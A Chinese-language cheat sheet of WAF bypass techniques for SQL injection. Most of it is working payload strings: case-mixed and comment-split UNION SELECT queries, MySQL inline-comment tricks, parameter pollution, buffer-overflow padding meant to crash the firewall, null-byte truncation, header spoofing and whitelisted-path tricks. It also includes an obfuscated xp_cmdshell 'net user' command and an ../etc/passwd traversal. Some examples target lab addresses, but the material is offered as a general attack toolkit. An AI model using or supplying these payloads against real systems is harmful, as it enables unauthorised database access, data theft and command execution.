大部分绕过方式
大小写/关键字替换 id=1 UnIoN/**/SeLeCT 1,user() Hex() bin() 等价于ascii() Sleep() 等价于 benchmark() Mid()substring() 等价于 substr() @@user 等价于 User() @@Version 等价于 version() 各种编码 大小写,URL,hex,%0A等 注释使用 // -- --+ # /**/ + :%00 /!**/等 再次循环 union==uunionnion 等价替换 user()=@@user() and=& or=| ascii=hex等 参数污染 ?id=1&id=2&id=3 编码解码及加密解密 s->%73->%25%37%33 hex,unlcode,base64等 更改请求提交方式 GET POST COOKIE等 POST->multipart/form-data 中间件HPP参数污染
靶机提前安装安全狗
大小写绕过/双重写绕过 比较渣渣的waf 可以使用大小写
http://10.4.7.100/sqli/Less-2/index.php?id=1 and 1=1
http://10.4.7.100/sqli/Less-4/index.php?id=1 And 1=1
base64加密绕过
http://10.4.7.100/sqli/Less-4/index.php?id=1 QW5kIDE9MQ==
编码绕过
http://10.4.7.100/sqli/Less-4/index.php?id=1 0x416e6420313d31
十六进制编码
Unicode编码
URL编码
等价函数
1.函数或变量 hex()、bin() ==> ascii() sleep() ==>benchmark() concat_ws()==>group_concat() mid()、substr() ==> substring() @@user ==> user() @@datadir ==> datadir() 举例:substring()和substr()无法使用时:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 或者:substr((select 'password'),1,1) = 0x70 strcmp(left('password',1), 0x69) = 1 strcmp(left('password',1), 0x70) = 0 strcmp(left('password',1), 0x71) = -1
特殊符号
1.使用反引号`,例如select `version()`,可以用来过空格和正则,特殊情况下还可以将其做注释符用 2.神奇的"-+.",select+id-1+1.from users; “+”是用于字符串连接的,”-”和”.”在此也用于连接,可以逃过空格和关键字过滤 3.@符号,select@^1.from users; @用于变量定义如**@****var_name**,一个@表示用户定义,@@表示系统变量 4.Mysql function() as xxx 也可不用as和空格 select-count(id)test from users; //绕过空格限制 `、~、!、@、%、()、[]、.、-、+ 、|、%00 举例: 关键字拆分:‘se’+’lec’+’t’ %S%E%L%E%C%T 1 1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell ”net user”’) !和():' or --+2=- -!!!'2 id=1+(UnI)(oN)+(SeL)(EcT) //另 Access中,”[]”用于表和列,”()”用于数值也可以做分隔
注释符混用
//, -- , /**/, #, --+,-- -, ;,--a 1.普通注释 举例:z.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4 'union%a0select pass from users# /**/在构造得查询语句中插入注释,规避对空格的依赖或关键字识别;#、--+用于终结语句的查询 2.内联注释 相比普通注释,内联注释用的更多,它有一个特性/!**/只有MySQL能识别 举例:index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3 ?id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2 # 部分bypass sqlinject payload id=1 union/*%00*/%23a%0A/*!/*!select 1,2,3*/;%23 id=-1 union/*%00*/%23a%0A/*!/*!select%201,database%23x%0A(),3*/;%23 id=-1%20union%20/*!44509select*/%201,2,3%23 id=-1%20union%20/*!44509select*/%201,%23x%0A/*!database*/(),3%23 id=-1 %20union%20all%23%0a%20select%201,2,3%23 -1 %20union%20all%23%0a%20select%201,%230%0Adatabase/**/(),3%23
更改提交方式
GET POST REQUEST
分隔重写绕过
通过注释分开敏感字,这样WAF的正则不起作用了,而带入查询的时候并不影响我们的结果
?id=1+un//ion+sel//ect+1,2,3--+
HTTP参数污染
假设这个URL:http://www.xxxx.com/search.php?id=110&id=911
百度会理解成让百度搜索:110 #选择了第一个参数,放弃了第二个参数。
雅虎会理解成让雅虎搜索:911 #选择了第二个参数,放弃了第一个参数。
谷歌会理解成让谷歌搜索:110 911 #两个参数同时选择。
<? php $x=$_GET['x']; echo $x; ?>
# 绕过 id=1/**&id=-1%20union%20select%201,2,3%23*/ # 正常写法 id=1&id=-1 union select 1,2,3#
缓冲区溢出
缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作
大部分防火墙都是基于C/C++开发的,我们可以使用缓冲区溢出使用WAF崩溃
?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+
数据库特性
#数据库特性 1、Mysql技巧 (1)mysql注释符有三种:#、/*...*/、-- ... (注意--后面有一个空格) (2)空格符:[0x09,0x0a-0x0d,0x20,0xa0] (3)特殊符号:%a 换行符 可结合注释符使用%23%0a,%2d%2d%0a。 (3)内联注释: /*!UnIon12345SelEcT*/ 1,user() //数字范围 1000-50540 (4)mysql黑魔法 select{x username}from {x11 test.admin}; 2、SQL Server技巧 (1)用来注释掉注射后查询的其余部分: /* C语言风格注释 -- SQL注释 ; 00% 空字节 (2)空白符:[0x01-0x20] (3)特殊符号:%3a 冒号 id=1 union:select 1,2 from:admin (4)函数变形:如db_name[空白字符]() 3、Oracle技巧 (1)注释符:--、/**/ (2)空白字符:[0x00,0x09,0x0a-0x0d,0x20] 4.配合FUZZ select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin
逻辑层 1、逻辑问题 (1)云waf防护,一般我们会尝试通过查找站点的真实IP,从而绕过CDN防护。 (2)当提交GET、POST同时请求时,进入POST逻辑,而忽略了GET请求的有害参数输入,可尝试Bypass。 (3)HTTP和HTTPS同时开放服务,没有做HTTP到HTTPS的强制跳转,导致HTTPS有WAF防护,HTTP没有防护,直接访问HTTP站点绕过防护。 (4)特殊符号%00,部分waf遇到%00截断,只能获取到前面的参数,无法获取到后面的有害参数输入,从而导致Bypass。比如:id=1%00and 1=2 union select 1,2,column_name from information_schema.columns 2、性能问题 猜想1:在设计WAF系统时,考虑自身性能问题,当数据量达到一定层级,不检测这部分数据。只要不断的填充数据,当数据达到一定数目之后,恶意代码就不会被检测了。 猜想2:不少WAF是C语言写的,而C语言自身没有缓冲区保护机制,因此如果WAF在处理测试向量时超出了其缓冲区长度就会引发bug,从而实现绕过。 例子1: ?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9 PS:0xA*1000指0xA后面”A"重复1000次,一般来说对应用软件构成缓冲区溢出都需要较大的测试长度,这里1000只做参考也许在有些情况下可能不需要这么长也能溢出。 例子2: ?a0=0&a1=1&.....&a100=100&id=1 union select 1,schema_name,3 from INFORMATION_SCHEMA.schemata 备注:获取请求参数,只获取前100个参数,第101个参数并没有获取到,导致SQL注入绕过。 3、白名单 方式一:IP白名单 从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。 测试方法:修改http的header来bypass waf X-forwarded-for X-remote-IP X-originating-IP x-remote-addr X-Real-ip 方式二:静态资源 特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),类似白名单机制,waf为了检测效率,不去检测这样一些静态文件名后缀的请求。 http://10.9.9.201/sql.php?id=1 http://10.9.9.201/sql.php/1.js?id=1 备注:Aspx/php只识别到前面的.aspx/.php 后面基本不识别 方式三:url白名单 为了防止误拦,部分waf内置默认的白名单列表,如admin/manager/system等管理后台。只要url中存在白名单的字符串,就作为白名单不进行检测。常见的url构造姿势: http://10.9.9.201/sql.php/admin.php?id=1 http://10.9.9.201/sql.php?a=/manage/&b=../etc/passwd http://10.9.9.201/../../../manage/../sql.asp?id=2 waf通过/manage/“进行比较,只要uri中存在/manage/就作为白名单不进行检测,这样我们可以通过/sql.php?a=/manage/&b=../etc/passwd 绕过防御规则。 方式四:爬虫白名单 部分waf有提供爬虫白名单的功能,识别爬虫的技术一般有两种: 1、 根据UserAgent 2、通过行为来判断 UserAgent可以很容易欺骗,我们可以伪装成爬虫尝试绕过。 User Agent Switcher (Firefox 附加组件),下载地址: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher
